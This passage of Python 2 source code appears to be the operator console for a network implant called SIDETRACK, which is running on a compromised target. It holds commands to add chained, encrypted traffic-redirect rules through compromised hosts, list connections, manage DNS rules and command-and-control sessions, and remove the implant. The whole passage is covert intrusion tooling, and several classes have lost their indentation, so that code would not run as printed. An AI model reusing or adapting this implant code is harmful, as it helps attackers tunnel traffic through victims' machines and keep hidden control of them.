                moreRules = 0
                lastRule = self.rule
            else:
                lastRule = res[0]
            printOut = printOut + self.preRuleString()
            printOut = printOut + res[1]
            # Sections 1-3 (answer/authority/additional) for this rule.
            for i in range(1,4):
                sec = self.GetSection(lastRule, i)
                if sec[0] == 0:
                    return (0, printOut)
                printOut = printOut + sec[1]
            printOut = printOut + self.postRuleString()
        return (1, printOut)
    def run(self,rule=-1, sec=-1, ext=-1):
        """dnslist [-v] [rule] [section].  With no arguments, list every
        rule.  With '-v' the remaining arguments shift left (sec becomes
        the rule number, ext the section) and all sections are shown."""
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0,msg)
        if rule == -1:
            # No arguments: brief listing of every rule.
            lastRule = 0
            moreRules = 1
            printOut = ''
            while moreRules:
                res = self.GetNextRule(lastRule)
                if res[0] == 0:
                    return res
                elif res[0] == -1:
                    moreRules = 0
                    lastRule = self.rule
                else:
                    lastRule = res[0]
                printOut = printOut + res[1]
        elif rule == "-v":
            if sec == -1:
                return self.runAll()
            else:
                if ext == -1:
                    # '-v <rule>': that rule plus all of its sections.
                    res = self.GetRule(sec)
                    if res[0] == 0:
                        return res
                    printOut = res[1]
                    for i in range(1,4):
                        sd = self.GetSection(sec, i)
                        if sd[0] == 0:
                            return (0, printOut)
                        printOut = printOut + sd[1]
                else:
                    # '-v <rule> <section>': one specific section.
                    return self.GetRule(sec,ext)
        else:
            if sec == -1:
                return self.GetRule(rule)
            else: # Rule != 0 and sec != -1
                return self.GetRule(rule,sec)
        return (1,printOut)
##########################################################################
# DNSSAVE class
#########################################################################
class SIDECMD_DNSSAVE(SIDECMD_DNSLIST):
def __init__(self):
SIDECMD_DNSLIST.__init__(self)
self.name = "dnssave"
self.usage = "dnssave [rule] [filename]"
self.info = "Save one of more rules"
def ToOct(self, data):
if type(data) == type(0x0L) or type(data) == type(0):
ret = ''
if data > 255:
if data > 65535:
if data > 16777215:
ret = ret + "\\%o" % ((int)(data/16777216)&0xffL)
ret = ret + "\\%o" % ((int)(data/65536)&0xffL)
ret = ret + "\\%o" % ((int)(data/256)&0xffL)
ret = ret + "\\%o" % (data & 0xffL)
else:
reg = regex.compile("^[a-zA-Z0-9-_.]*$")
ret = ''
for i in range(len(data)):
if reg.match(data[i:i+1]) != None:
ret = ret + data[i:i+1]
else:
ret = ret + "\\%o" % \
struct.unpack("!H",'\000'+data[i:i+1])[0]
return '"' + ret + '"'
def NameConvertName(self, name):
reg = regex.compile("^[a-zA-Z0-9-_.]*$")
ret = ''
sp = 0
if type(name) != type(0):
while name[sp:sp+1] != '\000':
namelen = struct.unpack("!H",'\000' + name[sp:sp+1])[0]
#print namelen
if sp != 0:
ret = ret + '.'
for i in range(1,namelen+1):
if reg.match(name[sp+i:sp+i+1]) != None:
ret = ret + name[sp+i:sp+i+1]
else:
raise TypeError, self.ToOct(name)
sp = sp+1+namelen
return ret
def NameConvert(self, name, padding=0):
try:
return self.NameConvertName(name)
except:
return self.ToOct(name)
def GetSectionString(self):
printOut = "%s %s %s %s %d " % \
(self.SectionConvert(self.rsec),
self.NameConvert(self.dnsname),
self.TypeConvert(self.rtype),
self.ClassConvert(self.rclass),
self.ttl&0xffffffL)
if self.dlen:
if self.rtype == 1 and self.dlen == 4:
printOut = printOut + self.ConvertToDot(self.dnsdata)
else:
printOut = printOut + self.NameConvert(self.dnsdata,10)
return printOut + '\n'
def GetRuleString(self):
printOut = "rule %s %s %d %s %s %s 0x%04x\n" % \
(self.ConvertToDot(self.fromIP),
self.ConvertToDot(self.fromMask),
self.longevity - self.rule,
self.TypeConvert(self.rtype),
self.ClassConvert(self.rclass),
self.NameConvert(self.dnsname),
self.dnsflags)
return printOut
def preRuleString(self):
return "# -----------------------------------------------------------------------\n"
def postRuleString(self):
return "set %s\n" % (self.FlagConvert(self.flag))
def run(self,rule=-1, file=-1):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if rule == -1: # All Rules to stdout
return self.runAll()
elif type(rule) == type(''): # All rules to file
out = open(rule,'w')
res = self.runAll()
if res[0] == 0:
return res
out.write(res[1])
out = None
return res
elif file == -1: # Single rule to stdout
res = self.GetRule(rule)
if res[0] == 0:
return res
printOut = res[1]
for i in range(1,4):
sd = self.GetSection(rule,i)
if sd[0] == 0:
return (0,printOut + sd[1])
printOut = printOut + sd[1]
return (1,printOut + self.postRuleString())
else: # Single rule to file
out = open(file,"w")
res = self.GetRule(rule)
if res[0] == 0:
return res
printOut = res[1]
for i in range(1,4):
sd = self.GetSection(rule,i)
if sd[0] == 0:
return (0,printOut + sd[1])
printOut = printOut + sd[1]
printOut = printOut + self.postRuleString()
out.write(printOut)
out = None
return (1,printOut)
#############################################################################
# REDIRADD class
# opcode 0x23
#############################################################################
class SIDECMD_REDIRADD(SIDECMD):
    # Builds a REDIRECT rule (op 0x23) from command-line style arguments.
    # When host_A names another session instead of an IP, the command
    # first recurses through that session's own 'rediradd' so traffic is
    # chained hop-by-hop toward this implant.
    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "rediradd"
        self.usage = "rediradd <protocol | all> <host_A> <host_B> [-insert <rule>]\n [-ttl (reset | <num>)] [-nocrypto] [-afix] [-tfix] [-samesum]\n [-longevity <time>] [-conntimeout <time>]\n\n <host_A>/<host_B> format: <ip_address>[:<local_port>/<remote_port>]\n"
        self.info = "Add a REDIRECT rule into SIDETRACK's rule set"
        self.op = 0x23L
    def parseProto(self,proto):
        """Map a protocol word (only the first letter matters) to its IP
        protocol number: Tcp=6, Udp=17, Icmp=1, All=0.  Non-string input
        is passed through; unknown words raise ValueError."""
        origproto = proto
        if type(proto) == type ('a'):
            proto = string.upper(proto)[:1]
            if proto == "T":
                proto = 6
            elif proto == "U":
                proto = 17
            elif proto == "I":
                proto = 1
            elif proto == "A":
                proto = 0
            else:
                raise ValueError, origproto
        return proto
    def parseHostInfo(self,host):
        """Parse '<ip|session>[:<local>/<remote>]'.
        Returns (session-or-None, packed ip, local port, remote port);
        ports are -1 when omitted or given as '*'.  A name that does not
        convert as an IP is looked up in base.sessionDict."""
        #split the ip from the ports
        res = string.split(host,":")
        if len(res) == 1:
            try:
                host = None
                ipaddr = self.ConvertIP(res[0])
            except:
                # Not an IP address: treat it as a session name.
                host = base.sessionDict[res[0]]
                ipaddr = self.ConvertIP(host.target.GetIP())
            return host,ipaddr,-1,-1
        elif len(res) == 2:
            ports = string.split(res[1],"/")
            if len(ports) != 2:
                raise ValueError, host
            if ports[0] == "*":
                ports[0] = -1
            else:
                ports[0] = eval(ports[0])
            if ports[1] == "*":
                ports[1] = -1
            else:
                ports[1] = eval(ports[1])
            try:
                host = None
                ipaddr = self.ConvertIP(res[0])
            except:
                host = base.sessionDict[res[0]]
                ipaddr = self.ConvertIP(host.target.GetIP())
            return host,ipaddr,ports[0],ports[1]
        else:
            raise ValueError, host
    def run(self,protocol,attacker,target,
            opt0=None,opt1=None,opt2=None,opt3=None,opt4=None,opt5=None,
            opt6=None,opt7=None,opt8=None,opt9=None,first=1):
        """Create the redirect rule.  'first' is 1 only on the hop the
        operator invoked directly; recursive hops are called with 0 and
        get munging instead of encryption (see below)."""
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0,msg,0)
        optList = [opt0,opt1,opt2,opt3,opt4,opt5,opt6,opt7,opt8,opt9]
        # Option defaults; each may be overridden by the -flags below.
        allProtoAT = 0
        allProtoTA = 0
        allRedir = 0
        ttl_reset = 1
        ttl_mod = 0
        munge = 1
        encrypt = 0
        afix = 1
        tfix = 1
        ident = 0
        seq = 0
        insert = 0
        samesum = 0
        longevity = 14400
        conn_to = 14400
        cmd = None
        localredir = 0
        if first:
            # First hop: encrypt instead of munge.
            munge = 0
            encrypt = 1
        protocol = self.parseProto(protocol)
        if protocol == 0:
            allRedir = 1
        host,A_ip,A_port,SA_port = self.parseHostInfo(attacker)
        host2,T_ip,T_port,ST_port = self.parseHostInfo(target)
        if host != None:
            # host_A is another session: recurse so that hop redirects
            # to this implant first, then splice its rule before ours.
            hpn = host.implant.parent.name
            myname = host.name
            attacker = re.sub(myname,hpn,attacker)
            cmd = host.GetCommand('rediradd')
            res = cmd.run(protocol,attacker,\
                  "%s:%d/%d"%(self.implant.session.target.ip,SA_port,A_port),\
                  opt0,opt1,opt2,opt3,opt4,opt5,opt6,opt7,opt8,opt9,0)
            if res[0] == 0:
                return res
            if res[2] != 0 and cmd.implant.session.target.hasAnotherAddress == 1:
                A_ip = struct.pack("!L",res[2])
        # Port wildcards must be used consistently on both sides of a
        # flow direction; mixing '*' with a concrete port is rejected.
        if SA_port == -1 and T_port != -1:
            base.db(1,"problem")
            raise ValueError, "Invalid ports"
        if SA_port != -1 and T_port == -1:
            base.db(1,"problem")
            raise ValueError, "Invalid ports"
        if ST_port == -1 and A_port != -1:
            base.db(1,"problem")
            raise ValueError, "Invalid ports"
        if ST_port != -1 and A_port == -1:
            base.db(1,"problem")
            raise ValueError, "Invalid ports"
        if SA_port == -1 and T_port == -1:
            allProtoAT = 1
            SA_port = 0
            T_port = 0
        if ST_port == -1 and A_port == -1:
            allProtoTA = 1
            ST_port = 0
            A_port = 0
        # Parse the args
        i=0
        while i < len(optList):
            if optList[i] == None:
                break
            elif string.upper(optList[i])[:3] == '-TT':
                # -ttl (reset | <num> | +/-<delta>)
                i = i+1
                if type(optList[i]) == type(1):
                    ttl_mod = optList[i]
                    if optList[i] < 0:
                        ttl_reset = 0
                    else:
                        ttl_reset = 1
                elif string.upper(optList[i])[:1] == 'R':
                    ttl_mod = 0
                    ttl_reset = 1
                elif optList[i][0] == '+' or optList[i][0] == '-':
                    ttl_mod = eval(optList[i])
                    ttl_reset = 0
                else:
                    raise ValueError, optList[i]
                #if ttl_reset == 0:
                #    ttl_mod = struct.pack("!H",ttl_mod)
                #else:
                #    ttl_mod = struct.pack("!h",ttl_mod)
            elif string.upper(optList[i])[:2] == '-I':
                i = i+1
                insert = optList[i]
            elif string.upper(optList[i])[:2] == '-L':
                i = i+1
                longevity = self.ConvertTime(optList[i])
            elif string.upper(optList[i])[:2] == '-C':
                i = i+1
                conn_to = self.ConvertTime(optList[i])
            elif string.upper(optList[i])[:2] == '-N':
                # -nocrypto: neither munge nor encrypt.
                munge = 0
                encrypt = 0
            elif string.upper(optList[i])[:2] == '-E':
                encrypt = 1
            elif string.upper(optList[i])[:2] == '-A':
                afix = 0
            elif string.upper(optList[i])[:3] == '-TF':
                tfix = 0
            elif string.upper(optList[i])[:2] == '-S':
                samesum = 1
            else:
                raise ValueError, optList[i]
            i = i + 1
        if T_ip == self.ConvertIP(self.implant.session.target.ip):
            # Redirecting to the implant host itself: no transforms.
            encrypt = 0
            munge = 0
            localredir = 1
        # Flag word layout (bit0 active, then afix, tfix, ttl_reset,
        # encrypt, munge, allRedir, allProtoAT, allProtoTA, ccSupport,
        # samesum).
        flags = 1 | afix << 1 | tfix << 2 | ttl_reset << 3 \
                | encrypt << 4 | munge << 5 | allRedir << 6 | allProtoAT << 7 \
                | allProtoTA << 8 | base.ccSupport << 9 | samesum << 10
        rd = crypto.GetRandom()
        if localredir == 0:
            ident = struct.unpack("!H",rd[0:2])[0]
        if munge:
            # Munge value must be odd and its low byte must not be 1.
            munge = struct.unpack("!L",rd[2:6])[0]
            if munge & 1L == 0:
                munge = munge + 1
            if munge & 0xffL == 1:
                munge = munge + 10
        if protocol == 6 and localredir == 0 and encrypt:
            seq = struct.unpack("!L", rd[22:26])[0]
        if encrypt:
            encrypt = struct.unpack("!LLLL",rd[6:22])
        else:
            encrypt = (0,0,0,0)
        base.db(2, seq)
        base.db(2, ident)
        self.redir =REDIRECT(self,insert,longevity,conn_to,protocol,A_ip,T_ip,\
                             ident,seq,munge,encrypt,ttl_mod,flags,\
                             A_port,SA_port,T_port,ST_port)
        ruleRes = self.redir.add()
        if ruleRes[0] and cmd != None:
            # Link this rule into the chain behind the upstream hop's.
            if cmd.redir != None:
                cmd.redir.next = self.redir
                self.redir.prev = cmd.redir
        return ruleRes
#############################################################################
# REDIRLIST class
# opcode 0x24
#############################################################################
class SIDECMD_REDIRLIST(SIDECMD):
    # Lists redirect rules (op 0x24), decoding the flag word back into
    # the rediradd-style options that produced it.
    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "redirlist"
        self.usage = "redirlist [rule]"
        self.info = "List redirect entries."
        self.op = 0x24L
    def parseReturn(self):
        """Unpack one redirect-rule reply from self.data and convert the
        numeric fields to display form."""
        self.ret, self.rule, self.longevity, self.conn_to, \
                  self.A_ip, self.T_ip, self.flags = \
                  struct.unpack("!LLLLLLH",self.data[:26])
        # ttl_mod and protocol are single bytes; zero-pad for !H unpack.
        self.ttl_mod = struct.unpack("!H",'\000'+self.data[26:27])[0]
        self.protocol = struct.unpack("!H", '\000'+self.data[27:28])[0]
        self.conns, self.ATcount, self.TAcount, self.seen, self.munge, \
                    self.A_port, self.SA_port, self.T_port, self.ST_port, \
                    self.seq = struct.unpack("!LLLLLHHHHL",self.data[28:60])
        self.A_ip = self.ConvertToDot(self.A_ip)
        self.T_ip = self.ConvertToDot(self.T_ip)
        # NOTE(review): subtracts timediff here while the dnslist code
        # adds it -- confirm which sign is correct.
        self.longevity = time.ctime(self.longevity-self.implant.timediff)[4:]
        if self.protocol == 1:
            self.protocol = "ICMP"
        elif self.protocol == 6:
            self.protocol = "TCP"
        elif self.protocol == 17:
            self.protocol = "UDP"
        elif self.protocol == 0:
            self.protocol = "ALL"
        else:
            self.protocol = eval("'%d'" % (self.protocol))
        if (self.flags & 0x1L):
            self.active = "ACTIVE"
        else:
            self.active = "INACTIVE"
        # Reconstruct the rediradd options from the flag bits (see the
        # flag assembly in SIDECMD_REDIRADD.run).
        self.opts = ''
        if not (self.flags & 0x2L):
            self.opts = self.opts + '-afix '
        if not (self.flags & 0x4L):
            self.opts = self.opts + '-tfix '
        if (self.flags & 0x400L):
            self.opts = self.opts + '-samesum '
        if self.flags & 0x8L:
            if self.ttl_mod == 0:
                self.opts = self.opts + '-ttl reset '
            else:
                self.opts = self.opts + '-ttl %d ' % (self.ttl_mod)
        else:
            # Signed delta stored in an unsigned byte: > 127 means
            # negative.
            if self.ttl_mod > 127:
                self.opts = self.opts + '-ttl %d' % (self.ttl_mod-256)
            else:
                self.opts = self.opts + '-ttl +%d ' % (self.ttl_mod)
        if not (self.flags & 0x30L):
            self.opts = self.opts + '-nocrypto '
    def outputPorts(self,attacker,flags,ip,lport,rport):
        """Format one endpoint as ip[:local/remote], substituting '*'
        for wildcarded ports per the allProto flag bits."""
        if flags & 0x40 or flags & 0x180 == 0x180:
            # all-protocol redirect (or both directions wildcarded):
            # ports are meaningless, print only the address.
            return ip
        if attacker and flags & 0x80:
            rport = '*'
        if attacker and flags & 0x100:
            lport = '*'
        if not attacker and flags & 0x80:
            lport = '*'
        if not attacker and flags & 0x100:
            rport = '*'
        if type(lport) != type('*'):
            lport = '%d' %(lport)
        if type(rport) != type('*'):
            rport = '%d' %(rport)
        return '%s:%s/%s' % (ip,lport,rport)
    def outputCurrent(self):
        # Three-line summary of the rule parsed by parseReturn().
        res = '%-5d %s Connection timeout: %s Expires: %s\n' % \
              (self.rule,self.active,\
               self.TimeConvert(self.conn_to),self.longevity)
        res = res + ' %s %s %s %s\n' % \
              (self.protocol,
               self.outputPorts(1,self.flags,self.A_ip,self.A_port,self.SA_port),
               self.outputPorts(0,self.flags,self.T_ip,self.T_port,self.ST_port),
               self.opts)
        res = res + ' Connections: %-4d Last seen %s\n A->T count: %-6d T->A count: %-6d\n' % (self.conns, time.ctime(self.seen-self.implant.timediff)[4:], self.ATcount, self.TAcount)
        return (1, res)
    def listOne(self,rule):
        """Query and format a single rule by id."""
        self.data = struct.pack("!LL",rule,0)
        self.Query()
        if self.op == 0x24L and self.res == 0x01L:
            self.parseReturn()
            return self.outputCurrent()
        else:
            return (0, "Implant did not return a valid response")
    def listAll(self):
        """Cursor-walk every rule; self.ret == 2 means an empty table."""
        out = ''
        self.ret = 1
        self.rule = 0
        while self.ret == 1:
            self.data = struct.pack("!LL",0,self.rule)
            self.Query()
            if self.op == 0x24L and self.res == 0x01L:
                self.parseReturn()
                res = self.outputCurrent()
                if res[0] == 0:
                    return res
                else:
                    out = out + res[1]
            else:
                return (0, "Error receiving result")
        if self.ret == 2:
            return (1, "No rules to list")
        else:
            return (1, out)
    def run(self,rule=None):
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0,msg)
        if self.implant.version < 2.0:
            return (0, "This feature is only available in versions >= 2.0")
        if rule == None:
            res = self.listAll()
        else:
            res = self.listOne(rule)
        return res
#############################################################################
# REDIRSET class
# opcode 0x25
#############################################################################
class SIDECMD_REDIRSET(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "redirset"
self.usage = "redirset <rule|all> <active|inactive>"
self.info = "Set a redirect rule as being active or inactive."
self.op = 0x25L
def run(self, rule, status):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if type(rule) == type("a") and string.upper(rule)[:1] == 'A':
rule = 0
if string.upper(status[:1]) == 'A':
status = 1
elif string.upper(status[:1]) == 'I':
status = 0
i=0
while i < len(self.implant.rules):
if self.implant.rules[i].remoteRuleNum == rule or rule == 0:
res = self.implant.rules[i].set(status)
if res[0] == 0:
return res
elif rule != 0:
break
i = i + 1
base.db(3,res[1])
if i == len(self.implant.rules) and rule != 0:
return (0, "Rule does not exist")
else:
return (1, "Rule(s) set successfully")
#############################################################################
# CONNREMOVE class
# opcode 0x28
#############################################################################
class SIDECMD_CONNREMOVE(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "connrm"
self.usage = "connrm <rule|all>"
self.info = "Remove a connection entry (or all connection entries)"
self.op = 0x28L
def run(self, rule):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
if type(rule) == type("a") and string.upper(rule)[:1] == 'A':
rule = 0
self.data = struct.pack("!L",rule)
self.Query()
if self.op == 0x28L and self.res == 0x1L:
return (1, "Connection(s) removed successfully")
else:
return (0, "Error removing connection(s)")
#############################################################################
# CONNLIST class
# opcode 0x27
#############################################################################
class SIDECMD_CONNLIST(SIDECMD):
    # Lists tracked connections (op 0x27), either all of them, one by
    # connection rule (-c), or those belonging to a redirect rule (-r).
    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "connlist"
        self.usage = "connlist [-c <rule> | -r <redir>]"
        self.info = "Lists a (or all) connection rules"
        self.op = 0x27L
    def convertState(self,state):
        """Map a numeric TCP-tracking state to its display name.
        NOTE(review): values > 6 fall through and return None (which
        prints as 'None') -- confirm whether that can occur."""
        if state == 0:
            return "INIT"
        elif state == 1:
            return "SYN_SENT"
        elif state == 2:
            return "SYN_RCVD"
        elif state == 3:
            return "SYN_ACK_RCVD"
        elif state == 4:
            return "SYN_ACK_SENT"
        elif state == 5:
            return "ESTABLISHED"
        elif state == 6:
            return "FIN_SENT"
    def parseReturn(self):
        """Unpack one connection reply from self.data into attributes."""
        self.ret,self.rule,self.redir,self.longevity = struct.unpack("!LLLL",self.data[0:16])
        # Four single-byte fields, zero-padded for !H unpacks.
        self.protocol = struct.unpack("!H", '\000'+self.data[16:17])[0]
        sendstate = struct.unpack("!H",'\000'+self.data[17:18])[0]
        recvstate = struct.unpack("!H",'\000'+self.data[18:19])[0]
        sender = struct.unpack("!H",'\000'+self.data[19:20])[0]
        self.at_cnt, self.ta_cnt, self.last, self.Aip, self.SAip, self.Tip,\
                     self.STip, self.Aport, self.SAport, self.Tport, self.STport \
                     = struct.unpack("!LLLLLLLHHHH",self.data[20:56])
        self.leftState = ''
        self.rightState = ''
        if self.protocol == 6:
            self.protocol = "TCP"
            # 'sender' selects which side the send/recv states belong to.
            if sender == 1:
                self.leftState = self.convertState(sendstate)
                self.rightState = self.convertState(recvstate)
            else:
                self.leftState = self.convertState(recvstate)
                self.rightState = self.convertState(sendstate)
        elif self.protocol == 17:
            self.protocol = "UDP"
        else:
            self.protocol = '%d' %(self.protocol)
    def outputCurrent(self):
        # Three-line summary: header, attacker<->implant leg with state
        # and byte count, implant<->target leg likewise.
        res = '%d %s Redir rule: %d Last seen: %s\n %s:%d <-%s(%d)-> %s:%d\n %s:%d <-%s(%d)-> %s:%d\n' % \
              (self.rule,self.protocol,self.redir,
               time.ctime(self.last+self.implant.timediff)[4:],
               self.ConvertToDot(self.Aip),self.Aport,
               self.leftState,self.at_cnt,
               self.ConvertToDot(self.SAip),self.SAport,
               self.ConvertToDot(self.STip),self.STport,
               self.rightState,self.ta_cnt,
               self.ConvertToDot(self.Tip),self.Tport)
        return (1,res)
    def listAll(self,redir):
        """Cursor-walk every connection (optionally filtered by redirect
        rule); self.ret == 2 signals an empty table."""
        out = ''
        self.ret = 1
        self.rule = 0
        while self.ret == 1:
            self.data = struct.pack("!LLL",0,self.rule,redir)
            self.Query()
            if self.op == 0x27L and self.res == 0x01L:
                self.parseReturn()
                res = self.outputCurrent()
                if res[0] == 0:
                    return res
                else:
                    out = out + res[1]
            else:
                return (0, "Error receiving result")
        if self.ret == 2:
            return (1,"No connections to list")
        else:
            return (1,out)
    def listOne(self,rule):
        """Query and format one connection by its rule id."""
        self.data = struct.pack("!LLL",rule,0,0)
        self.Query()
        if self.op == 0x27L and self.res == 0x01L:
            self.parseReturn()
            return self.outputCurrent()
        else:
            return (0, "Implant did not return a valid response")
    def run(self, option=None, value=None):
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0,msg)
        if self.implant.version < 2.0:
            return (0, "This feature is only available in versions >= 2.0")
        rule = 0
        redir = 0
        if option != None:
            if option == '-c':
                rule = value
            elif option == '-r':
                redir = value
            else:
                raise TypeError, option
        if rule == 0:
            res = self.listAll(redir)
        else:
            res = self.listOne(rule)
        return res
#############################################################################
# REDIRREMOVE class
# opcode 0x26
#############################################################################
class SIDECMD_REDIRREMOVE(SIDECMD):
    # Removes redirect rules (op 0x26).  Locally tracked REDIRECT
    # objects are torn down through their own remove() (which also
    # deletes them from self.implant.rules); anything not tracked
    # locally -- or 'all' -- is removed with a direct query.
    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "redirrm"
        self.usage = "redirrm <rule|all>"
        self.info = "Remove a redirect rule (or all redirect rules)"
        self.op = 0x26L
    def run(self, rule):
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0,msg)
        if self.implant.version < 2.0:
            return (0, "This feature is only available in versions >= 2.0")
        removed = 0
        # 'all' (any word starting with a/A) means every rule (id 0).
        if type(rule) == type("a") and string.upper(rule)[:1] == 'A':
            rule = 0
        i = 0
        while i < len(self.implant.rules):
            if self.implant.rules[i].remoteRuleNum == rule or rule == 0:
                res = self.implant.rules[i].remove()
                if res[0] == 0:
                    return res
                removed = 1
                # remove() deletes the entry from implant.rules, so step
                # the index back to compensate for the shifted list.
                i = i - 1
            i = i + 1
        if removed == 0 or rule == 0:
            # Not tracked locally (or removing everything): tell the
            # implant directly.
            self.data = struct.pack("!L",rule)
            self.Query()
            if self.op == 0x26L and self.res == 0x1L:
                return (1, "Rule(s) removed successfully")
            else:
                return (0, "Error removing rule(s)")
        else:
            # A specific, locally tracked rule was removed above; pass
            # its result through.
            return res
#############################################################################
# CCLIST class
# opcode 0x29
#############################################################################
class SIDECMD_CCLIST(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "cclist"
self.usage = "cclist"
self.info = "List all of the command and control sessions"
self.op = 0x29L
def parseReturn(self):
self.more,self.rule,self.longevity,self.srcip,self.dstip,\
self.srcport,self.dstport = struct.unpack("!LLLLLHH",self.data[0:24])
if self.more & 2L:
self.current = "(CURRENT) "
else:
self.current = ""
self.longevity = time.ctime(self.longevity-self.implant.timediff)[4:]
self.srcip = self.ConvertToDot(self.srcip)
self.dstip = self.ConvertToDot(self.dstip)
def displayCurrent(self):
# STUB: Make this better!
if self.rule == 0xffffffffL:
return ""
res = "%d %s%s:%d<->%s:%d Expires: %s\n" % \
(self.rule,self.current,self.srcip,self.srcport,\
self.dstip,self.dstport,self.longevity)
return res
def run(self):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
res = ""
last = 0L
self.more = 1
while self.more & 1L:
self.data = struct.pack("!L",last)
self.Query()
if self.op == 0x29L and self.res == 0x1L:
self.parseReturn()
res = self.displayCurrent() + res
last = self.rule
else:
return (0, "Error getting CC rules")
return (1,res)
#############################################################################
# CCREMOVE class
# opcode 0x2a
#############################################################################
class SIDECMD_CCREMOVE(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "ccremove"
self.usage = "ccremove <rule>"
self.info = "Remove a command and control session (see also: done)"
self.op = 0x2aL
def run(self,rule):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
self.data = struct.pack("!L",rule)
self.Query()
if self.op == 0x2aL and self.res == 0x1L:
return (1, "Session removed successfully")
else:
return (0, "Unable to remove CC session (note: you cannot remove yourself, see: done)")
#############################################################################
# UNLOAD class
# opcode 0x30
#############################################################################
class SIDECMD_UNLOAD(SIDECMD):
    """Command: remove SIDETRACK from the target (opcode 0x30)."""
    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "stunload"
        self.usage = "stunload <magic>"
        self.info = "Remove SIDETRACK from the target"
        self.op = 0x30L
    def run(self, magic):
        """Send the unload request.

        magic: 32-bit value packed into the request (semantics not visible
        here; presumably a confirmation token -- confirm).
        Returns (1, msg) on success, (0, msg) on failure.  Requires an
        implant version >= 2.0.
        """
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0,msg)
        if self.implant.version < 2.0:
            return (0, "This feature is only available in versions >= 2.0")
        self.data = struct.pack("!L",magic);
        self.Query()
        if self.op == 0x30L and self.res == 0x1L:
            return (1, "SIDETRACK successfully removed from target")
        else:
            return (0, "Cannot remove SIDETRACK");
base.RegisterImplant('SIDETRACK', SIDETRACK)
class REDIRECT(SIDECMD):
    """One SIDETRACK traffic-redirection rule (Python 2 code).

    Holds the full parameter set for a single attacker(A)<->target(T)
    redirection (IPs, ports, crypto key, munge value, TTL modifier,
    flags, ...), plus chain links (prev/next) so a rule spanning several
    hops can be added, removed and updated as a unit.  Rule state is
    mirrored on the remote implant (remoteRuleNum) and in the local
    redirector (localRuleNum).
    """
    def __init__(self, cmd, next, longevity, connection_timeout, protocol,\
                 A_ip, T_ip, ident, seq, munge, crypto_key, ttl_mod, flags, \
                 A_port, SA_port, T_port, ST_port):
        SIDECMD.__init__(self)
        # Borrow communication context from the command that created us.
        self.protocol = cmd.protocol
        self.implant = cmd.implant
        self.session = cmd.implant.session
        self.target = cmd.implant.session.target
        self.longevity = longevity
        self.nextRule = next
        self.connection_timeout = connection_timeout
        self.proto = protocol
        # Naming convention (inferred): A_* attacker side, T_* target side,
        # S*_port SIDETRACK-local ports -- confirm against callers.
        self.A_ip = A_ip
        self.T_ip = T_ip
        self.ident = ident
        self.seq = seq
        self.munge = munge
        self.crypto_key = crypto_key
        self.ttl_mod = ttl_mod
        self.flags = flags
        self.A_port = A_port
        self.SA_port = SA_port
        self.T_port = T_port
        self.ST_port = ST_port
        # Not installed yet: no local/remote rule ids, no chain links, and
        # no command-and-control passthrough attached.
        self.added = 0
        self.localRuleNum = None
        self.remoteRuleNum = None
        self.prev = None
        self.next = None
        self.ccPassthru = None
    def remove(self,direction=0):
        """Remove this rule remotely (opcode 0x26) and locally, then
        propagate removal along the chain.

        direction: 0 = user-initiated (propagate both ways);
                   1 = invoked by our 'next' neighbor (don't recurse forward);
                   2 = invoked by our 'prev' neighbor (don't recurse backward).
        Returns (1, msg) on success, (0, msg) on failure.
        """
        if self.added == 0:
            return (0, "Rule does not exist")
        # Tear down any CC passthrough riding on this rule first.
        if self.ccPassthru != None:
            cmd = self.ccPassthru.GetCommand('done')
            cmd.run()
        if direction != 1 and self.next != None:
            res = self.next.remove(2)
            if res[0] == 0:
                return (res[0], "Rule could not be removed: " + res[1])
            self.next = None
        if self.remoteRuleNum != None:
            # Opcode 0x26: remove remote rule by number.
            self.op = 0x26L
            self.data = struct.pack("!L",self.remoteRuleNum)
            self.Query()
            if self.op == 0x26L and self.res == 0x1L:
                base.redir.delete(self.localRuleNum)
                self.added = 0
                self.localRuleNum = None
                self.implant.rules.remove(self)
                if direction != 2 and self.prev != None:
                    res = self.prev.remove(1)
                    if res[0] == 0:
                        return (0,"Rule %d removed: %s"%(self.remoteRuleNum,res[1]))
                return (1, "Rule %d removed"%(self.remoteRuleNum))
            else:
                return (0, "Rule could not be removed")
        else:
            # No remote half: only the local redirector entry exists.
            base.redir.delete(self.localRuleNum)
            return (1, "Local rule removed")
    def set(self,value,direction=0):
        """Update a 16-bit rule parameter (opcode 0x25; presumably the
        longevity -- confirm) remotely and locally, propagating along the
        chain.  'direction' has the same meaning as in remove().
        Returns (1, msg) on success, (0, msg) on failure.
        """
        if self.added == 0:
            return (0, "Rule does not exist")
        if direction != 1 and self.next != None:
            res = self.next.set(value,2)
            if res[0] == 0:
                return(res[0], "Rule could not be set: " + res[1])
        if self.remoteRuleNum:
            self.op = 0x25L
            self.data = struct.pack("!LH",self.remoteRuleNum, value)
            self.Query()
            if self.op == 0x25L and self.res == 0x1L:
                base.redir.set(self.localRuleNum, value)
                if direction != 2 and self.prev != None:
                    res = self.prev.set(value,1)
                    if res[0] == 0:
                        return (0,"Rule %d set: %s"%(self.remoteRuleNum,res[1]))
                return (1, "Rule %d set"%(self.remoteRuleNum))
            else:
                return (0, "Rule could not be set")
        else:
            base.redir.set(self.localRuleNum, value)
